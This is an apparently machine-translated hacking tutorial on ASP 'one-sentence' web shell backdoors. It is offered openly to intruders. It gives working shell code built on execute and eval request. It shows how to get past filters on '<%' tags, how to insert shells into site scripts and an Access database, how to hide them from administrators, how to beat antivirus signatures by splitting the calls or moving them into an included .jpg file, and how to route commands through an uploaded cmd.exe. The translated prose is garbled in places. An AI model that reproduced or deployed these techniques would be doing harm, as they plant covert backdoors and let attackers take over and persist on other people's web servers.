During the intrusion process, we often encounter this problem. Because the trojan is too big to upload, what should we do? In this case, we can only use the pony for assistance. However, the pony statement was killed again. Today, let's talk about the pony's no-killing method.
The statement in one sentence is <% execute request ("password") %>
1. Intrusion<%, %> What should I do if the symbol is filtered? We can try to avoid <%, %>
<Scriptlanguage = VBScript runat = server> execute request ("cmd") </Script>
2. The smallest Trojan code circulating in the NetworkYes <% eval request ("#") %> what if the connection fails? Just write the Trojan horse separately!
<% Y = request ("x") %> <% execute (Y) %> [code]
In this way, it is okay to submit the data separately to the database!
However, the physical location of the newly added data in the ACCESS database is before the old data, so you must first write the <% execute (Y) %> section. After writing the password on the client, you can enter any character except "x". If you enter "x", an error will occur!
3. inserting a sentence is prone to errors.For example
[Code]
Sub unlockPost ()
Dim id, replyid, rs, posttable
Id = Request ("id ")
Replyid = Request ("replyid ")
If Not IsNumeric (id) or id = "" Then
Write
Sub unlockPost (<% eval request ("#") %>)
Dim id, replyid, rs, posttable
Id = Request ("id ")
Replyid = Request ("replyid ")
If Not IsNumeric (id) or id = "" Then
You can also write a format with a fault tolerance statement !!
<% If request ("cmd") <> "" then execute request ("cmd") %>
4. One-sentence Trojan to two-sentence Trojan transformation!
One-sentence Trojan server prototype: <% execute request ("value") %>,
After Deformation: <% On Error Resume Next execute request ("value") %>,
Why do we need to use a Trojan Horse? It is because it makes our backdoors more concealed.
I have also tried to insert an ASP file of WellShell in one sentence, but errors often occur during access, while the Trojan server can be accessed normally after inserting two sentences, it has no effect on the page of the site.
In this way, the website is more concealed. The Administrator will not delete all the webpage files.
My WellShell now has such a backdoor. when selecting the ASP file for which you want to insert two sentences, you should note that you should select some ASP files that can be accessed by IE instead of conn. insert files such as asp. Of course, the client connected to a Trojan still uses a trojan client without modification.
5. Do not kill in one sentence:
I. Deformation Method
For example, a horse like eval (request ("#") is generally not killed. But in fact, anti-virus software often lists eval (request as a signature. So let's make some changes.
E = request ("id ")
Eval (E)
In this way, the kill-free operation can be achieved.
For example: <% execute request ("1") %> after deformation:
<% E = request ("1 ")
Execute E %>
Of course, this kind of deformation is best done.
This article introduces the second method: because many administrators are very smart, they will check the execute and eval functions in ASP files. Therefore, no matter how you decompile it, it will always use one of the functions to explain the operation, so it is still found. Okay, we can use an external file to call it. Create an a.jpg or any file suffix or file name that is not found. Write execute (request ("#"), of course, you can first deform and then put it. Then insert it into the ASP file.
<! -- # Include file = "a.jpg" -->
To reference it.
However, the administrator can find the modified file by comparing the file, but this is not the case.
6. Use the command prompt in WEBSHELL
In dig to your WEBSHELL directory (for other directories, COPY the absolute path of cmd.exe on the uploaded directory), and then modify your WEBSHELL to find the code to call CMD. EXE. The original code is as follows:
. Exec ("cmd.exe/c" & DefCmd). stdout. readall
Change
. Exec ("the absolute path of cmd.exe to be uploaded"/c "& DefCmd). stdout. readall
For example, if the directory you uploaded is D: \ web \ www \ cmd.exe, change it
. Exec ("D: \ web \ www \ cmd.exe/c" & DefCmd). stdout. readall